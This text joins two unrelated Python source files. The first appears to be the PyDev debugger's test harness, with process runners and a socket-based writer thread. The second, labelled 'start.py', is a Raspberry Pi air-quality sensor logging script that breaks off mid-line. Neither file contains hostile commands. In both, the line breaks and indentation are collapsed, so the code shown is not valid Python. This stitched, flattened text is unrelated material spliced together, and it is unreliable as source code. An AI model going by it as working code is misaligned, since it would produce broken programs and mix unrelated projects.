stdout = dct_with_stdout_stder['stdout'] stderr = dct_with_stdout_stder['stderr'] writer.additional_output_checks(''.join(stdout), ''.join(stderr)) except IgnoreFailureError: sys.stderr.write('Test finished with ignored failure.\n') return def create_process(self, args, writer): env = writer.get_environ() if writer is not None else None if env is None: env = os.environ.copy() if self.pydevd_debug_file: env['PYDEVD_DEBUG'] = 'True' env['PYDEVD_DEBUG_FILE'] = self.pydevd_debug_file print('Logging to: %s' % (self.pydevd_debug_file,)) process = subprocess.Popen( args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=writer.get_cwd() if writer is not None else '.', env=env, ) return process @contextmanager def run_process(self, args, writer): process = self.create_process(args, writer) writer.process = process stdout = [] stderr = [] finish = [False] dct_with_stdout_stder = {} fail_with_message = False try: start_in_daemon_thread(read_process, (process.stdout, stdout, sys.stdout, 'stdout', finish)) start_in_daemon_thread(read_process, (process.stderr, stderr, sys.stderr, 'stderr', finish)) if SHOW_OTHER_DEBUG_INFO: print('Both processes started') # polls can fail (because the process may finish and the thread still not -- so, we give it some more chances to # finish successfully). initial_time = time.time() shown_intermediate = False dumped_threads = False dct_with_stdout_stder['stdout'] = stdout dct_with_stdout_stder['stderr'] = stderr try: yield dct_with_stdout_stder except: fail_with_message = True # Let's print the actuayl exception here (it doesn't appear properly on Python 2 and # on Python 3 it's hard to find because pytest output is too verbose). 
sys.stderr.write('***********\n') sys.stderr.write('***********\n') sys.stderr.write('***********\n') traceback.print_exc() sys.stderr.write('***********\n') sys.stderr.write('***********\n') sys.stderr.write('***********\n') raise if not writer.finished_ok: self.fail_with_message( "The thread that was doing the tests didn't finish successfully (writer.finished_ok = True not set).", stdout, stderr, writer ) while True: if process.poll() is not None: if writer.EXPECTED_RETURNCODE != 'any': expected_returncode = writer.EXPECTED_RETURNCODE if not isinstance(expected_returncode, (list, tuple)): expected_returncode = (expected_returncode,) if process.returncode not in expected_returncode: self.fail_with_message('Expected process.returncode to be %s. Found: %s' % ( writer.EXPECTED_RETURNCODE, process.returncode), stdout, stderr, writer) break else: if writer is not None: if writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK: process.kill() continue if not shown_intermediate and (time.time() - initial_time > (TIMEOUT / 3.)): # 1/3 of timeout print('Warning: writer thread exited and process still did not (%.2fs seconds elapsed).' % (time.time() - initial_time,)) shown_intermediate = True if time.time() - initial_time > ((TIMEOUT / 3.) * 2.): # 2/3 of timeout if not dumped_threads: dumped_threads = True # It still didn't finish. Ask for a thread dump # (we'll be able to see it later on the test output stderr). try: writer.write_dump_threads() except: traceback.print_exc() if time.time() - initial_time > TIMEOUT: # timed out process.kill() time.sleep(.2) self.fail_with_message( "The other process should've exited but still didn't (%.2fs seconds timeout for process to exit)." % (time.time() - initial_time,), stdout, stderr, writer ) time.sleep(.2) if writer is not None: if not writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK: if stdout is None: self.fail_with_message( "The other process may still be running -- and didn't give any output.", stdout, stderr, writer) check = 0 while not writer.check_test_suceeded_msg(stdout, stderr): check += 1 if check == 50: self.fail_with_message("TEST SUCEEDED not found.", stdout, stderr, writer) time.sleep(.1) except TimeoutError: msg = 'TimeoutError' try: writer.write_dump_threads() except: msg += ' (note: error trying to dump threads on timeout).' time.sleep(.2) self.fail_with_message(msg, stdout, stderr, writer) except Exception as e: if fail_with_message: self.fail_with_message(str(e), stdout, stderr, writer) else: raise finally: try: if process.poll() is None: process.kill() except: traceback.print_exc() finish[0] = True def fail_with_message(self, msg, stdout, stderr, writerThread): log_contents = '' for f in pydev_log.list_log_files(self.pydevd_debug_file): if os.path.exists(f): with open(f, 'r') as stream: log_contents += '\n-------------------- %s ------------------\n\n' % (f,) log_contents += stream.read() msg += ("\n\n===========================\nStdout: \n" + ''.join(stdout) + "\n\n===========================\nStderr:" + ''.join(stderr) + "\n\n===========================\nWriter Log:\n" + '\n'.join(getattr(writerThread, 'log', [])) + "\n\n===========================\nLog:" + log_contents) if IS_JYTHON: # It seems we have some spurious errors which make Jython tests flaky (on a test run it's # not unusual for one test among all the tests to fail with this error on Jython). 
# The usual traceback in this case is: # # Traceback (most recent call last): # File "/home/travis/build/fabioz/PyDev.Debugger/_pydevd_bundle/pydevd_comm.py", line 287, in _on_run # line = self._read_line() # File "/home/travis/build/fabioz/PyDev.Debugger/_pydevd_bundle/pydevd_comm.py", line 270, in _read_line # r = self.sock.recv(1024) # File "/home/travis/build/fabioz/PyDev.Debugger/_pydevd_bundle/pydevd_comm.py", line 270, in _read_line # r = self.sock.recv(1024) # File "/home/travis/jython/Lib/_socket.py", line 1270, in recv # data, _ = self._get_message(bufsize, "recv") # File "/home/travis/jython/Lib/_socket.py", line 384, in handle_exception # raise _map_exception(jlx) # error: [Errno -1] Unmapped exception: java.lang.NullPointerException # # So, ignore errors in this situation. if 'error: [Errno -1] Unmapped exception: java.lang.NullPointerException' in msg: raise IgnoreFailureError() raise AssertionError(msg) #======================================================================================================================= # AbstractWriterThread #======================================================================================================================= class AbstractWriterThread(threading.Thread): FORCE_KILL_PROCESS_WHEN_FINISHED_OK = False IS_MODULE = False TEST_FILE = None EXPECTED_RETURNCODE = 0 def __init__(self, *args, **kwargs): threading.Thread.__init__(self, *args, **kwargs) self.process = None # Set after the process is created. self.setDaemon(True) self.finished_ok = False self.finished_initialization = False self._next_breakpoint_id = 0 self.log = [] def run(self): self.start_socket() def check_test_suceeded_msg(self, stdout, stderr): return 'TEST SUCEEDED' in ''.join(stdout) def update_command_line_args(self, args): return args def _ignore_stderr_line(self, line): if line.startswith(( 'debugger: ', '>>', '<<', 'warning: Debugger speedups', 'pydev debugger: New process is launching', 'pydev debugger: To debug that process', '*** Multiprocess', )): return True for expected in ( 'PyDev console: using IPython', 'Attempting to work in a virtualenv. If you encounter problems, please', ): if expected in line: return True if re.match(r'^(\d+)\t(\d)+', line): return True if IS_JYTHON: for expected in ( 'org.python.netty.util.concurrent.DefaultPromise', 'org.python.netty.util.concurrent.SingleThreadEventExecutor', 'Failed to submit a listener notification task. Event loop shut down?', 'java.util.concurrent.RejectedExecutionException', 'An event executor terminated with non-empty task', 'java.lang.UnsupportedOperationException', "RuntimeWarning: Parent module '_pydevd_bundle' not found while handling absolute import", 'from _pydevd_bundle.pydevd_additional_thread_info_regular import _current_frames', 'from _pydevd_bundle.pydevd_additional_thread_info import _current_frames', 'import org.python.core as PyCore #@UnresolvedImport', 'from _pydevd_bundle.pydevd_additional_thread_info import set_additional_thread_info', "RuntimeWarning: Parent module '_pydevd_bundle._debug_adapter' not found while handling absolute import", 'import json', # Issues with Jython and Java 9. 
'WARNING: Illegal reflective access by org.python.core.PySystemState', 'WARNING: Please consider reporting this to the maintainers of org.python.core.PySystemState', 'WARNING: An illegal reflective access operation has occurred', 'WARNING: Illegal reflective access by jnr.posix.JavaLibCHelper', 'WARNING: Please consider reporting this to the maintainers of jnr.posix.JavaLibCHelper', 'WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations', 'WARNING: All illegal access operations will be denied in a future release', ): if expected in line: return True if line.strip().startswith('at '): return True if IS_PY26: # Sometimes in the ci there's an unhandled exception which doesn't have a stack trace # (apparently this happens when a daemon thread dies during process shutdown). # This was only reproducible on the ci on Python 2.6, so, ignoring that output on Python 2.6 only. for expected in ( 'Unhandled exception in thread started by <_pydev_bundle.pydev_monkey._NewThreadStartupWithTrace'): if expected in line: return True return False def additional_output_checks(self, stdout, stderr): lines_with_error = [] for line in stderr.splitlines(): line = line.strip() if not line: continue if not self._ignore_stderr_line(line): lines_with_error.append(line) if lines_with_error: raise AssertionError('Did not expect to have line(s) in stderr:\n\n%s\n\nFull stderr:\n\n%s' % ( '\n'.join(lines_with_error), stderr)) def get_environ(self): return None def get_pydevd_file(self): dirname = os.path.dirname(__file__) dirname = os.path.dirname(dirname) return os.path.abspath(os.path.join(dirname, 'pydevd.py')) def get_pydevconsole_file(self): dirname = os.path.dirname(__file__) dirname = os.path.dirname(dirname) return os.path.abspath(os.path.join(dirname, 'pydevconsole.py')) def get_line_index_with_content(self, line_content, filename=None): ''' :return the line index which has the given content (1-based). ''' if filename is None: filename = self.TEST_FILE with open(filename, 'r') as stream: for i_line, line in enumerate(stream): if line_content in line: return i_line + 1 raise AssertionError('Did not find: %s in %s' % (line_content, self.TEST_FILE)) def get_cwd(self): return os.path.dirname(self.get_pydevd_file()) def get_command_line_args(self): return [self.TEST_FILE] def do_kill(self): if hasattr(self, 'server_socket'): self.server_socket.close() delattr(self, 'server_socket') if hasattr(self, 'reader_thread'): # if it's not created, it's not there... 
self.reader_thread.do_kill() delattr(self, 'reader_thread') if hasattr(self, 'sock'): self.sock.close() delattr(self, 'sock') if hasattr(self, 'port'): delattr(self, 'port') def write_with_content_len(self, msg): self.log.append('write: %s' % (msg,)) if SHOW_WRITES_AND_READS: print('Test Writer Thread Written %s' % (msg,)) if not hasattr(self, 'sock'): print('%s.sock not available when sending: %s' % (self, msg)) return if not isinstance(msg, bytes): msg = msg.encode('utf-8') self.sock.sendall((u'Content-Length: %s\r\n\r\n' % len(msg)).encode('ascii')) self.sock.sendall(msg) _WRITE_LOG_PREFIX = 'write: ' def write(self, s): from _pydevd_bundle.pydevd_comm import ID_TO_MEANING meaning = ID_TO_MEANING.get(re.search(r'\d+', s).group(), '') if meaning: meaning += ': ' self.log.append(self._WRITE_LOG_PREFIX + '%s%s' % (meaning, s,)) if SHOW_WRITES_AND_READS: print('Test Writer Thread Written %s%s' % (meaning, s,)) msg = s + '\n' if not hasattr(self, 'sock'): print('%s.sock not available when sending: %s' % (self, msg)) return if IS_PY3K: msg = msg.encode('utf-8') self.sock.send(msg) def get_next_message(self, context_message, timeout=None): return self.reader_thread.get_next_message(context_message, timeout=timeout) def start_socket(self, port=None): assert not hasattr(self, 'port'), 'Socket already initialized.' from _pydev_bundle.pydev_localhost import get_socket_name if SHOW_WRITES_AND_READS: print('start_socket') self._sequence = -1 if port is None: socket_name = get_socket_name(close=True) else: socket_name = (pydev_localhost.get_localhost(), port) server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_socket.bind(socket_name) self.port = socket_name[1] server_socket.listen(1) if SHOW_WRITES_AND_READS: print('Waiting in socket.accept()') self.server_socket = server_socket new_socket, addr = server_socket.accept() if SHOW_WRITES_AND_READS: print('Test Writer Thread Socket:', new_socket, addr) self._set_socket(new_socket) def _set_socket(self, new_socket): curr_socket = getattr(self, 'sock', None) if curr_socket: try: curr_socket.shutdown(socket.SHUT_WR) except: pass try: curr_socket.close() except: pass reader_thread = self.reader_thread = ReaderThread(new_socket) self.sock = new_socket reader_thread.start() # initial command is always the version self.write_version() self.log.append('start_socket') self.finished_initialization = True def start_socket_client(self, host, port): self._sequence = -1 if SHOW_WRITES_AND_READS: print("Connecting to %s:%s" % (host, port)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set TCP keepalive on an open socket. # It activates after 1 second (TCP_KEEPIDLE,) of idleness, # then sends a keepalive ping once every 3 seconds (TCP_KEEPINTVL), # and closes the connection after 5 failed ping (TCP_KEEPCNT), or 15 seconds try: from socket import IPPROTO_TCP, SO_KEEPALIVE, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT s.setsockopt(socket.SOL_SOCKET, SO_KEEPALIVE, 1) s.setsockopt(IPPROTO_TCP, TCP_KEEPIDLE, 1) s.setsockopt(IPPROTO_TCP, TCP_KEEPINTVL, 3) s.setsockopt(IPPROTO_TCP, TCP_KEEPCNT, 5) except ImportError: pass # May not be available everywhere. # 10 seconds default timeout timeout = int(os.environ.get('PYDEVD_CONNECT_TIMEOUT', 10)) s.settimeout(timeout) for _i in range(20): try: s.connect((host, port)) break except: time.sleep(.5) # We may have to wait a bit more and retry (especially on PyPy). 
s.settimeout(None) # no timeout after connected if SHOW_WRITES_AND_READS: print("Connected.") self._set_socket(s) return s def next_breakpoint_id(self): self._next_breakpoint_id += 1 return self._next_breakpoint_id def next_seq(self): self._sequence += 2 return self._sequence def wait_for_new_thread(self): # wait for hit breakpoint last = '' while not '<xml><thread name="' in last or '<xml><thread name="pydevd.' in last: last = self.get_next_message('wait_for_new_thread') # we have something like <xml><thread name="MainThread" id="12103472" /></xml> splitted = last.split('"') thread_id = splitted[3] return thread_id def wait_for_output(self): # Something as: # <xml><io s="TEST SUCEEDED%2521" ctx="1"/></xml> while True: msg = self.get_next_message('wait_output') if "<xml><io s=" in msg: if 'ctx="1"' in msg: ctx = 'stdout' elif 'ctx="2"' in msg: ctx = 'stderr' else: raise AssertionError('IO message without ctx.') msg = unquote_plus(unquote_plus(msg.split('"')[1])) return msg, ctx def get_current_stack_hit(self, thread_id, **kwargs): self.write_get_thread_stack(thread_id) msg = self.wait_for_message(CMD_GET_THREAD_STACK) return self._get_stack_as_hit(msg, **kwargs) def wait_for_single_notification_as_hit(self, reason=REASON_STOP_ON_BREAKPOINT, **kwargs): dct = self.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION) assert dct['stop_reason'] == reason line = kwargs.pop('line', None) file = kwargs.pop('file', None) assert not kwargs, 'Unexpected kwargs: %s' % (kwargs,) return self.get_current_stack_hit(dct['thread_id'], line=line, file=file) def wait_for_breakpoint_hit(self, reason=REASON_STOP_ON_BREAKPOINT, timeout=None, **kwargs): ''' 108 is over 109 is return 111 is breakpoint :param reason: may be the actual reason (int or string) or a list of reasons. ''' # note: those must be passed in kwargs. line = kwargs.get('line') file = kwargs.get('file') name = kwargs.get('name') self.log.append('Start: wait_for_breakpoint_hit') # wait for hit breakpoint if not isinstance(reason, (list, tuple)): reason = (reason,) def accept_message(last): for r in reason: if ('stop_reason="%s"' % (r,)) in last: return True return False msg = self.wait_for_message(accept_message, timeout=timeout) return self._get_stack_as_hit(msg, file, line, name) def _get_stack_as_hit(self, msg, file=None, line=None, name=None): # we have something like <xml><thread id="12152656" stop_reason="111"><frame id="12453120" name="encode" ... 
if len(msg.thread.frame) == 0: frame = msg.thread.frame else: frame = msg.thread.frame[0] thread_id = msg.thread['id'] frame_id = frame['id'] suspend_type = msg.thread['suspend_type'] hit_name = frame['name'] frame_line = int(frame['line']) frame_file = frame['file'] if file is not None: assert frame_file.endswith(file), 'Expected hit to be in file %s, was: %s' % (file, frame_file) if line is not None: assert line == frame_line, 'Expected hit to be in line %s, was: %s (in file: %s)' % (line, frame_line, frame_file) if name is not None: if not isinstance(name, (list, tuple, set)): assert name == hit_name else: assert hit_name in name self.log.append('End(1): wait_for_breakpoint_hit: %s' % (msg.original_xml,)) return Hit( thread_id=thread_id, frame_id=frame_id, line=frame_line, suspend_type=suspend_type, name=hit_name, file=frame_file) def wait_for_get_next_statement_targets(self): last = '' while not '<xml><line>' in last: last = self.get_next_message('wait_for_get_next_statement_targets') matches = re.finditer(r"(<line>([0-9]*)<\/line>)", last, re.IGNORECASE) lines = [] for _, match in enumerate(matches): try: lines.append(int(match.group(2))) except ValueError: pass return set(lines) def wait_for_custom_operation(self, expected): # wait for custom operation response, the response is double encoded expected_encoded = quote(quote_plus(expected)) last = '' while not expected_encoded in last: last = self.get_next_message('wait_for_custom_operation. Expected (encoded): %s' % (expected_encoded,)) return True def _is_var_in_last(self, expected, last): if expected in last: return True last = unquote_plus(last) if expected in last: return True # We actually quote 2 times on the backend... last = unquote_plus(last) if expected in last: return True return False def wait_for_multiple_vars(self, expected_vars): if not isinstance(expected_vars, (list, tuple)): expected_vars = [expected_vars] all_found = [] ignored = [] while True: try: last = self.get_next_message('wait_for_multiple_vars: %s' % (expected_vars,)) except: missing = [] for v in expected_vars: if v not in all_found: missing.append(v) raise ValueError('Not Found:\n%s\nNot found messages: %s\nFound messages: %s\nExpected messages: %s\nIgnored messages:\n%s' % ( '\n'.join(str(x) for x in missing), len(missing), len(all_found), len(expected_vars), '\n'.join(str(x) for x in ignored))) was_message_used = False new_expected = [] for expected in expected_vars: found_expected = False if isinstance(expected, (tuple, list)): for e in expected: if self._is_var_in_last(e, last): was_message_used = True found_expected = True all_found.append(expected) break else: if self._is_var_in_last(expected, last): was_message_used = True found_expected = True all_found.append(expected) if not found_expected: new_expected.append(expected) expected_vars = new_expected if not expected_vars: return True if not was_message_used: ignored.append(last) wait_for_var = wait_for_multiple_vars wait_for_vars = wait_for_multiple_vars wait_for_evaluation = wait_for_multiple_vars def write_make_initial_run(self): self.write("101\t%s\t" % self.next_seq()) self.log.append('write_make_initial_run') def write_set_protocol(self, protocol): self.write("%s\t%s\t%s" % (CMD_SET_PROTOCOL, self.next_seq(), protocol)) def write_authenticate(self, access_token, client_access_token): msg = "%s\t%s\t%s" % (CMD_AUTHENTICATE, self.next_seq(), access_token) self.write(msg) self.wait_for_message(lambda msg:client_access_token in msg, expect_xml=False) def write_version(self): from 
_pydevd_bundle.pydevd_constants import IS_WINDOWS self.write("%s\t%s\t1.0\t%s\tID" % (CMD_VERSION, self.next_seq(), 'WINDOWS' if IS_WINDOWS else 'UNIX')) def get_main_filename(self): return self.TEST_FILE def write_show_return_vars(self, show=1): self.write("%s\t%s\tCMD_SHOW_RETURN_VALUES\t%s" % (CMD_SHOW_RETURN_VALUES, self.next_seq(), show)) def write_add_breakpoint(self, line, func='None', filename=None, hit_condition=None, is_logpoint=False, suspend_policy=None, condition=None): ''' :param line: starts at 1 :param func: if None, may hit in any context, empty string only top level, otherwise must be method name. ''' if filename is None: filename = self.get_main_filename() breakpoint_id = self.next_breakpoint_id() if hit_condition is None and not is_logpoint and suspend_policy is None and condition is None: # Format kept for backward compatibility tests self.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\tNone\tNone" % ( CMD_SET_BREAK, self.next_seq(), breakpoint_id, 'python-line', filename, line, func)) else: # Format: breakpoint_id, type, file, line, func_name, condition, expression, hit_condition, is_logpoint, suspend_policy self.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\tNone\t%s\t%s\t%s" % ( CMD_SET_BREAK, self.next_seq(), breakpoint_id, 'python-line', filename, line, func, condition, hit_condition, is_logpoint, suspend_policy)) self.log.append('write_add_breakpoint: %s line: %s func: %s' % (breakpoint_id, line, func)) return breakpoint_id def write_multi_threads_single_notification(self, multi_threads_single_notification): self.write_json_config(dict( multi_threads_single_notification=multi_threads_single_notification, )) def write_suspend_on_breakpoint_exception(self, skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception): self.write_json_config(dict( skip_suspend_on_breakpoint_exception=skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception=skip_print_breakpoint_exception )) def write_json_config(self, config_dict): self.write("%s\t%s\t%s" % (CMD_PYDEVD_JSON_CONFIG, self.next_seq(), json.dumps(config_dict) )) def write_stop_on_start(self, stop=True): self.write("%s\t%s\t%s" % (CMD_STOP_ON_START, self.next_seq(), stop)) def write_dump_threads(self): self.write("%s\t%s\t" % (CMD_THREAD_DUMP_TO_STDERR, self.next_seq())) def write_add_exception_breakpoint(self, exception): self.write("%s\t%s\t%s" % (CMD_ADD_EXCEPTION_BREAK, self.next_seq(), exception)) self.log.append('write_add_exception_breakpoint: %s' % (exception,)) def write_get_current_exception(self, thread_id): self.write("%s\t%s\t%s" % (CMD_GET_EXCEPTION_DETAILS, self.next_seq(), thread_id)) def write_set_py_exception_globals( self, break_on_uncaught, break_on_caught, skip_on_exceptions_thrown_in_same_context, ignore_exceptions_thrown_in_lines_with_ignore_exception, ignore_libraries, exceptions=() ): # Only set the globals, others self.write("131\t%s\t%s" % (self.next_seq(), '%s;%s;%s;%s;%s;%s' % ( 'true' if break_on_uncaught else 'false', 'true' if break_on_caught else 'false', 'true' if skip_on_exceptions_thrown_in_same_context else 'false', 'true' if ignore_exceptions_thrown_in_lines_with_ignore_exception else 'false', 'true' if ignore_libraries else 'false', ';'.join(exceptions) ))) self.log.append('write_set_py_exception_globals') def write_start_redirect(self): self.write("%s\t%s\t%s" % (CMD_REDIRECT_OUTPUT, self.next_seq(), 'STDERR STDOUT')) def write_set_project_roots(self, project_roots): self.write("%s\t%s\t%s" % (CMD_SET_PROJECT_ROOTS, self.next_seq(), '\t'.join(str(x) for x in project_roots))) def 
write_add_exception_breakpoint_with_policy( self, exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries): self.write("%s\t%s\t%s" % (CMD_ADD_EXCEPTION_BREAK, self.next_seq(), '\t'.join(str(x) for x in [ exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries]))) self.log.append('write_add_exception_breakpoint: %s' % (exception,)) def write_remove_exception_breakpoint(self, exception): self.write('%s\t%s\t%s' % (CMD_REMOVE_EXCEPTION_BREAK, self.next_seq(), exception)) def write_remove_breakpoint(self, breakpoint_id): self.write("%s\t%s\t%s\t%s\t%s" % ( CMD_REMOVE_BREAK, self.next_seq(), 'python-line', self.get_main_filename(), breakpoint_id)) def write_change_variable(self, thread_id, frame_id, varname, value): self.write("%s\t%s\t%s\t%s\t%s\t%s\t%s" % ( CMD_CHANGE_VARIABLE, self.next_seq(), thread_id, frame_id, 'FRAME', varname, value)) def write_get_frame(self, thread_id, frame_id): self.write("%s\t%s\t%s\t%s\tFRAME" % (CMD_GET_FRAME, self.next_seq(), thread_id, frame_id)) self.log.append('write_get_frame') def write_get_variable(self, thread_id, frame_id, var_attrs): self.write("%s\t%s\t%s\t%s\tFRAME\t%s" % (CMD_GET_VARIABLE, self.next_seq(), thread_id, frame_id, var_attrs)) def write_step_over(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_OVER, self.next_seq(), thread_id,)) def write_step_in(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_INTO, self.next_seq(), thread_id,)) def write_step_in_my_code(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_INTO_MY_CODE, self.next_seq(), thread_id,)) def write_step_return(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_RETURN, self.next_seq(), thread_id,)) def write_step_return_my_code(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_RETURN_MY_CODE, self.next_seq(), thread_id,)) def write_step_over_my_code(self, thread_id): self.write("%s\t%s\t%s" % (CMD_STEP_OVER_MY_CODE, self.next_seq(), thread_id,)) def write_suspend_thread(self, thread_id): self.write("%s\t%s\t%s" % (CMD_THREAD_SUSPEND, self.next_seq(), thread_id,)) def write_reload(self, module_name): self.log.append('write_reload') self.write("%s\t%s\t%s" % (CMD_RELOAD_CODE, self.next_seq(), module_name,)) def write_run_thread(self, thread_id): self.log.append('write_run_thread') self.write("%s\t%s\t%s" % (CMD_THREAD_RUN, self.next_seq(), thread_id,)) def write_get_thread_stack(self, thread_id): self.log.append('write_get_thread_stack') self.write("%s\t%s\t%s" % (CMD_GET_THREAD_STACK, self.next_seq(), thread_id,)) def write_load_source(self, filename): self.log.append('write_load_source') self.write("%s\t%s\t%s" % (CMD_LOAD_SOURCE, self.next_seq(), filename,)) def write_load_source_from_frame_id(self, frame_id): from _pydevd_bundle.pydevd_comm_constants import CMD_LOAD_SOURCE_FROM_FRAME_ID self.log.append('write_load_source_from_frame_id') self.write("%s\t%s\t%s" % (CMD_LOAD_SOURCE_FROM_FRAME_ID, self.next_seq(), frame_id,)) def write_kill_thread(self, thread_id): self.write("%s\t%s\t%s" % (CMD_THREAD_KILL, self.next_seq(), thread_id,)) def write_set_next_statement(self, thread_id, line, func_name): self.write("%s\t%s\t%s\t%s\t%s" % (CMD_SET_NEXT_STATEMENT, self.next_seq(), thread_id, line, func_name,)) def write_debug_console_expression(self, locator): self.write("%s\t%s\t%s" % (CMD_EVALUATE_CONSOLE_EXPRESSION, self.next_seq(), locator)) def write_custom_operation(self, locator, style, codeOrFile, operation_fn_name): self.write("%s\t%s\t%s||%s\t%s\t%s" % ( CMD_RUN_CUSTOM_OPERATION, 
self.next_seq(), locator, style, codeOrFile, operation_fn_name)) def write_evaluate_expression(self, locator, expression): self.write("%s\t%s\t%s\t%s\t1" % (CMD_EVALUATE_EXPRESSION, self.next_seq(), locator, expression)) def write_enable_dont_trace(self, enable): if enable: enable = 'true' else: enable = 'false' self.write("%s\t%s\t%s" % (CMD_ENABLE_DONT_TRACE, self.next_seq(), enable)) def write_get_next_statement_targets(self, thread_id, frame_id): self.write("201\t%s\t%s\t%s" % (self.next_seq(), thread_id, frame_id)) self.log.append('write_get_next_statement_targets') def write_list_threads(self): seq = self.next_seq() self.write("%s\t%s\t" % (CMD_LIST_THREADS, seq)) return seq def wait_for_list_threads(self, seq): return self.wait_for_message('502') def wait_for_get_thread_stack_message(self): return self.wait_for_message(CMD_GET_THREAD_STACK) def wait_for_json_message(self, accept_message, unquote_msg=True, timeout=None): last = self.wait_for_message(accept_message, unquote_msg, expect_xml=False, timeout=timeout) json_msg = last.split('\t', 2)[-1] # We have something as: CMD\tSEQ\tJSON if isinstance(json_msg, bytes): json_msg = json_msg.decode('utf-8') try: return json.loads(json_msg) except: traceback.print_exc() raise AssertionError('Unable to parse:\n%s\njson:\n%s' % (last, json_msg)) def wait_for_message(self, accept_message, unquote_msg=True, expect_xml=True, timeout=None): if isinstance(accept_message, (str, int)): msg_starts_with = '%s\t' % (accept_message,) def accept_message(msg): return msg.startswith(msg_starts_with) import untangle from io import StringIO prev = None while True: last = self.get_next_message('wait_for_message', timeout=timeout) if unquote_msg: last = unquote_plus(unquote_plus(last)) if accept_message(last): if expect_xml: # Extract xml and return untangled. xml = '' try: xml = last[last.index('<xml>'):] if isinstance(xml, bytes): xml = xml.decode('utf-8') xml = untangle.parse(StringIO(xml)) except: traceback.print_exc() raise AssertionError('Unable to parse:\n%s\nxml:\n%s' % (last, xml)) ret = xml.xml ret.original_xml = last return ret else: return last if prev != last: print('Ignored message: %r' % (last,)) prev = last def get_frame_names(self, thread_id): self.write_get_thread_stack(thread_id) msg = self.wait_for_message(CMD_GET_THREAD_STACK) if msg.thread.frame: frame_names = [frame['name'] for frame in msg.thread.frame] return frame_names return [msg.thread.frame['name']] def wait_for_thread_join(self, main_thread_id): def condition(): return self.get_frame_names(main_thread_id) in ( ['wait', 'join', '<module>'], ['_wait_for_tstate_lock', 'join', '<module>'] ) def msg(): return 'Found stack: %s' % (self.get_frame_names(main_thread_id),) wait_for_condition(condition, msg, timeout=5, sleep=.5) def create_request_thread(self, full_url): class T(threading.Thread): def wait_for_contents(self): for _ in range(10): if hasattr(self, 'contents'): break time.sleep(.3) else: raise AssertionError('Unable to get contents from server. 
Url: %s' % (full_url,)) return self.contents def run(self): try: from urllib.request import urlopen except ImportError: from urllib import urlopen for _ in range(10): try: stream = urlopen(full_url) contents = stream.read() if IS_PY3K: contents = contents.decode('utf-8') self.contents = contents break except IOError: continue t = T() t.daemon = True return t def _get_debugger_test_file(filename): ret = os.path.abspath(os.path.join(os.path.dirname(__file__), filename)) if not os.path.exists(ret): ret = os.path.join(os.path.dirname(__file__), 'resources', filename) if not os.path.exists(ret): raise AssertionError('Expected: %s to exist.' % (ret,)) return ret def get_free_port(): from _pydev_bundle.pydev_localhost import get_socket_name return get_socket_name(close=True)[1]
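# Illustrative sketch only (not used by the tests): how a line-based protocol
# message is composed before AbstractWriterThread.write() sends it. The writer
# keeps an odd sequence counter (it starts at -1 and next_seq() adds 2, so the
# first value is 1) and joins command id, sequence and payload with tabs, in the
# same format write_add_breakpoint() uses above. The arguments here are
# hypothetical example values.
def _example_breakpoint_message(seq, breakpoint_id, filename, line, func='None'):
    # e.g. "111\t1\t1\tpython-line\t/path/to/file.py\t10\tNone\tNone\tNone"
    return "%s\t%s\t%s\t%s\t%s\t%s\t%s\tNone\tNone" % (
        CMD_SET_BREAK, seq, breakpoint_id, 'python-line', filename, line, func)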
start.py
#!/usr/bin/env python #imports from __future__ import print_function import threading as th import multiprocessing as mp import serial import time import struct import datetime import sys import os.path sys.path.append("..") #Import varaibles in run from AQ_Plot_server directory sys.path.append(sys.path[0][0:sys.path[0].find("AQ_run")]) #Import varaiblesif run from home directory import variables as V if V.DHTON=="ON": from DHT import DHT MODE=V.MODE if MODE=="GPS": from GPS2 import Work #IF GPS is on import module if V.BLINKT=="ON": from blinkt import set_pixel, set_brightness, show, clear from sds_rec import SDS011 as sds #Gloabl varaibles FOLDER=V.DATAFOLDER #Folder location for data save LOCATION=V.LOC[0] #RPI3 operation location lat=V.LOC[1]#location latatuide lon=V.LOC[2]#location longatuide RPI=V.DEVICERAN def initFile(date,RPI,FOLDER,LOCATION,SENSORS): #create columes depending on sensors and OPRATION columns="time" NAMES="" if MODE =="GPS": LOCATION=LOCATION+"_GPS" columns=columns+",lat,lon,alt" if V.DHTON=="ON": for sen in V.DHTNAMES: columns=columns+",DHT-RH,DHT-T" if V.OPCON=="ON": for sen in SENSORS: #check which sensors are running to add to the csv filre name (If multiple add the togher in order data is made) if NAMES=="": NAMES=NAMES+sen else: NAMES=NAMES+","+str(sen)#solution to odd error, when python does not think str are str #loop through sensors to create columns if "SDS" in sen or "sds" in sen: columns=columns+",sds-pm2.5,sds-pm10,sds-ExtraData" #Note: ExtraData is a extra bit of data recored by the SDS but there no information on what it actully is. If you know please let me know. #create the csv csvnames=NAMES.replace(",","-") #replace the commers from the Sensors names to add tio file name ofile= FOLDER + LOCATION +"_"+ RPI+'_' +csvnames+"_"+ str(date).replace('-','') + ".csv" # print("Opening Output File:") if(not os.path.isfile(ofile)): print("creat new file ",ofile) f=open(ofile,'w+')#open file #First add time period ts = time.time() tnow = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') print("Time Period,start:,"+tnow+",end:,",file=f) #Add sensors information print("Sensors:,"+NAMES,file=f) #Add locations print("Location:,"+LOCATION+",Lat-Lon,"+lat+","+lon,file=f) #Add interval time print("Interval 